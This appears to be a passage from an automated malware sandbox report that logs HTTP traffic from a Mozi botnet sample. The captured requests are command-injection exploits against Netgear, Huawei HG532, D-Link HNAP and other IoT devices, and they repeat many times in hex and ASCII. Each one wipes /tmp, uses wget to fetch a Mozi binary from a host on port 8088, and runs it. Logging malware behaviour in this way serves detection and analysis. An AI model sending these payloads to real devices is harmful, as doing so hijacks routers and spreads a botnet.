78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 121.136.2.49:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 26.83.38.216:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 167.210.102.18:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 158.219.39.254:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 142.31.67.244:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 73.34.189.202:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 125.163.236.226:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
